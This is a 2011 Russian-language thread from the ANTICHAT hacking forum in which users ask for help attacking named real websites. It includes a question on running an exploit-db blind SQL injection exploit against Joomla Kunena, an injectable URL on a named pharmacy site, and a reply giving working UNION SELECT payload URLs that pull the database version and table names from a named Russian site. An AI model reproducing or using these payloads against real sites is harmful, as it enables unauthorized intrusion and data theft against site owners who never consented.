ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.03.2011, 22:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
8829
Репутация:
-3
|
|
При проверке file_priv выдалось
SELECT command denied to user 'g4rt'@'localhost' for table 'user'
это типа в доступе к file_priv отказано, да?
|
|
|
|
15.03.2011, 03:49
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от None
При проверке file_priv выдалось
SELECT command denied to user 'g4rt'@'localhost' for table 'user'
это типа в доступе к file_priv отказано, да?
Это значит что отказано в доступе к базе данных под именем "mysql" и к таблице "mysql.user" в частности, соответственно, в большинстве случаев file_priv тоже нет.
|
|
|
15.03.2011, 16:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
30555
Репутация:
85
|
|
Привет всем!
В общем захотелось заняться пентестом джумлы)
нашел на сайте уязвимый Joomla Kunena Forums
также для него нашел эксплойт под BSQL
http://www.exploit-db.com/exploits/9408/
Подскажите пожалуйста как заюзать эксплойт?
в эксплойте написано
Сообщение от None
Usage: target.php [site][SQL]
понятно что юзать скрипт надо по шаблону вида
exploit.php?site=http://joomlasite.... но вот не понятно на какую именно страницу надо передавать!
Может кто пояснить? |
|
|
|
15.03.2011, 16:41
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
на страницу, в которой есть уязвимый параметр. и передавать нужно последним параметр(в случае если их несколько)
|
|
|
|
15.03.2011, 17:33
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
http://www.rxinternational.com/pricelist.asp?mscquery=spray'
не могу раскрутить
|
|
|
|
15.03.2011, 21:06
|
|
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
Провел на форуме:
3426765
Репутация:
257
|
|
Сообщение от pinch
pinch said:
http://www.rxinternational.com/pricelist.asp?mscquery=spray'
не могу раскрутить
Microsoft Access
Рекомендую прочесть эту статью:
/threadnav50550-1-10.html
|
|
|
|
15.03.2011, 21:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
8829
Репутация:
-3
|
|
http://minysa.ru/infusions/mp3/song.php?song_id=-340'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19--'
При вставке слов страница не загружается, как обойти?
|
|
|
|
15.03.2011, 21:21
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
скобки нельзя использовать
Код:
Code:
http://minysa.ru/infusions/mp3/song.php?song_id=-340%27+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14%20,15,16,17,18,19--%27
предсказывая следующий вопрос, можно сделать так:
Код:
Code:
http://minysa.ru/infusions/mp3/song.php?song_id=-340%27+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14%20,15,16,17,18,19+from+information_schema.tables+limit+17,1--%20%27
|
|
|
|
15.03.2011, 23:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
8829
Репутация:
-3
|
|
Возможно ли вотэто как либо использовать?
http://www.gamereplays.org/community/index.php?act=SF&f=99999999
|
|
|
|
16.03.2011, 00:46
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от asql
asql said:
Возможно ли вотэто как либо использовать?
http://www.gamereplays.org/community/index.php?act=SF&f=99999999
Нет, данная переменная принимает только числа.
Может начнем статьи читать и немного изучим PHP + MySQL?
//и начнём читать статьи прежде чем задать вопрос
|
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
